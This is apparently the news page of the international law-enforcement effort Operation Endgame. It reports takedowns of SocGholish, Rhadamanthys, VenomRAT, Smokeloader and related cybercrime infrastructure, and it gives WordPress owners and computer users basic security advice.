• BCLCC - Brigade Centrale de Lutte Contre la Cybercriminalité logo
  • National enhed for Særlig Kriminalitet logo
  • Europol logo
  • Federal Bureau of Investigation logo
  • JUNALCO logo
  • National Crime Agency logo
  • Office anti-cybercriminalité logo
  • Openbaar Ministerie logo
  • Politie logo
  • FIOD logo
  • Unité nationale cyber de la Gendarmerie nationale logo
  • United States Secret Service logo
  • DCIS logo
  • Eurojust logo
  • Bundeskriminalamt logo
  • Royal Canadian Mounted Police logo
  • Ottawa Police Service logo
  • Belgian Federal Police logo
  • Australian Federal Police logo

News

Previously in Endgame

International law enforcement initiate hunt on malware group SocGholish

In Operation Endgame, a major operation this week disrupted a key infection chain used by cybercriminals. Within an international cooperation, 14.971 websites infected with SocGholish malware were remediated. This malware is used by a criminal group that plays a pivotal role in international cybercrime, namely: Evil Corp.

SocGholish exploits hacked legitimate WordPress sites to spread malware to visitors, with the aim of gaining unauthorized access to their computer systems. WordPress is the world’s most widely used platform for building websites. According to WordPress, more than 43% of all websites on the internet are powered by WordPress. The login credentials of 1.4 million websites have been leaked. That means these sites are vulnerable to malware infection. About 14.971 sites that provide everyday services have been infected with this malware. This includes websites of restaurants or auto‑garages.

Maikel Rollman, National High Tech Crime Unit: “With these actions we deprive cybercriminals of access to infected computer systems. This prevents further damage to the digital systems of citizens, businesses and organizations worldwide and limits the spread of malware. It also reduces the risk that these systems are used for cyber‑attacks on critical infrastructure and other essential societal processes. This marks the beginning of further action against SocGholish.”

14.971 websites remediated and disruption of the SocGholish botnet

In the past few days, the Netherlands (NHCTU), Canada (RCMP), the United States (FBI) and Germany (BKA), with support from Europol and Eurojust, delivered a major blow to SocGholish’s criminal infrastructure during a joint action week.

Worldwide, 106 servers and domains were taken down. 14.971 websites have been remediated. In addition, the following actions were carried out:

  • Cleaning infected WordPress sites and victim notification, urging previously infected WordPress owners to update their sites and change their login credentials.
  • Disabling the SocGholish botnet by taking over domain names and taking servers offline.
  • Victim notification for owners of WordPress sites whose leaked login credentials were identified by the police, via HaveIBeenPwned, DIVD, Spamhaus, CheckjeHack, NoMoreLeaks, The Shadowserver Foundation and NCSC (Netherlands).

Call to all WordPress website owners

The Dutch police have removed backdoors and malware from the infected WordPress sites. The owners of these sites have been informed. They are urged to:

  • change their login credentials;
  • enable multi‑factor authentication;
  • delete any unknown additional WordPress accounts;
  • keep their WordPress site up‑to‑date in the future.

Do you also have a WordPress website? Prevent yourself from becoming a victim in the future by applying these security steps.

Prevent your computer from being infected by SocGholish malware

SocGholish is also known as ‘FakeUpdates’. Its malware is distributed via fake software updates, for example for internet browsers. When someone installs a fake update, the malware opens a connection to the hackers, who subsequently gain access to the computer system. Whit this so-called initial access, even more dangerous software can then be installed.

Tips to prevent infection:

  • Never trust pop‑ups that appear in your browser.
  • Do not trust updates that are overly flashy and scream for immediate action.
  • Ensure you have an up-to-date virus scanner and leave it enabled during the installation of new software.
  • A genuine update always comes from the official source, for example via your system settings or the app store.

SocGholish malware and Evil Corp

SocGholish has been a constant threat since 2017 and is used to install malware on users, including various ransomware strains that have been employed to attack critical infrastructures. This has resulted in many victims. This is primarily done by hacking websites built with WordPress and infecting them with malware.

SocGholish is linked to the Russian cybercriminal group Evil Corp. This group has previously been responsible for Zeus and Dridex malware and is also associated with several large‑scale ransomware and money‑laundering operations.

End of the game for cybercrime infrastructure: 1025 servers taken down

Between 10 and 13 November 2025, the latest phase of Operation Endgame was coordinated from Europol’s headquarters in The Hague. The actions targeted one of the biggest infostealer Rhadamanthys, the Remote Access Trojan VenomRAT, and the botnet Elysium, all of which played a key role in international cybercrime. Authorities took down these three large cybercrime enablers. The main suspect for VenomRAT was arrested in Greece on 3 November 2025.

The infrastructure dismantled during the action days was responsible for infecting hundreds of thousands of victims worldwide with malware. The dismantled malware infrastructure consisted of hundreds of thousands of infected computers containing several million stolen credentials. Many of the victims were not aware of the infection of their systems. The main suspect behind the infostealer had access to over 100.000 crypto wallets belonging to these victims, potentially worth millions of euros. Check if your computer has been infected and what to do if so: https://www.politie.nl/checkyourhack and https://haveibeenpwned.com.

Operation ENDGAME strikes again: the ransomware kill chain broken at its source

Cybercriminals around the world have suffered a major disruption after law enforcement and judicial authorities, coordinated by Europol and Eurojust, dismantled key infrastructure behind the malware used to launch ransomware attacks. From 19 to 22 May, authorities took down some 300 servers worldwide, neutralised 650 domains, and issued international arrest warrants against 20 targets, dealing a direct blow to the ransomware kill chain.

In addition, EUR 3.5 million in cryptocurrency was seized during the action week, bringing the total amount seized during Operation Endgame to EUR 21.2 million.

This latest phase of Operation ENDGAME follows on from the largest-ever international action against botnets in May 2024. It targeted new malware variants and successor groups that re-emerged after last year’s takedowns, reinforcing law enforcement’s capacity to adapt and strike back – even as cybercriminals retool and reorganise.

Operation Endgame follow-up leads to five detentions and interrogations as well as server takedowns

In a coordinated series of actions, customers of the Smokeloader pay-per-install botnet, operated by the actor known as ‘Superstar’, faced consequences such as arrests, house searches, arrest warrants or ‘knock and talks’. Superstar used his botnet to run a pay-per-install service, enabling customers to gain access to victims’ machines.

Customers used the service to deploy malware for their own criminal activities. Investigations revealed that botnet access was purchased for a range of purposes, including keylogging, webcam access, ransomware deployment, cryptomining and more. Law enforcement tracked down the customers as they were registered in a database seized during Operation Endgame.

Robust international actions against illicit virtual currency exchanges

Operation Endgame continues taking actions to disrupt the cybercriminal ecosystem. In the last week, multiple cryptocurrency exchanges were taken offline by international law enforcement agencies and judicial authorities. These service providers facilitated many different criminal financial flows, such as ransomware.

Money laundering facilitates all kinds of serious crime and enables criminals to stay out of reach of investigative authorities. Service providers have an obligation to investigate whether money may have a criminal origin. Knowingly accepting cryptocurrencies derived from crime and thus facilitating money laundering is always punishable by law.

Several botnets dismantled in largest international operation

During a joint action by international law enforcement agencies and judicial authorities several botnets that played a key role in cybercrime were dismantled. Four arrests were made and sixteen premises were searched worldwide over the past few days. Additionally, eight summons were served against suspects. Many national and international organisations in the public and private sectors also played an important role in this operation.

The operation enabled us to simultaneously take down these botnets and disrupt the infrastructure used by cybercriminals. Botnets are used for different types of cybercrime, for example ransomware. The dismantled botnets consisted of millions of infected computer systems.

Many of the victims were not aware of the infection of their systems. The estimated financial loss these criminals have caused to companies and government institutions amounts to hundreds of millions of euros.

This large-scale action is called Operation Endgame.

Operation Endgame does not end today. New actions will be announced on this website.

If you have information about the suspects in Operation Endgame, feel free to contact us

Partners

  • IBM X-Force logo
  • Infoblox logo
  • Shadowserver logo
  • Cryptolaemus logo
  • Team Cymru logo
  • Prodaft logo
  • Proofpoint logo
  • Sekoia logo
  • Zscaler logo
  • Abuse.ch logo
  • Spamhaus logo
  • Have I Been Pwned logo
  • Bitdefender logo
  • Crowdstrike logo
  • Lumen logo
  • Spycloud logo
  • Trellix logo
  • ESET logo
  • Microsoft logo
  • DIVD logo
  • NCSC logo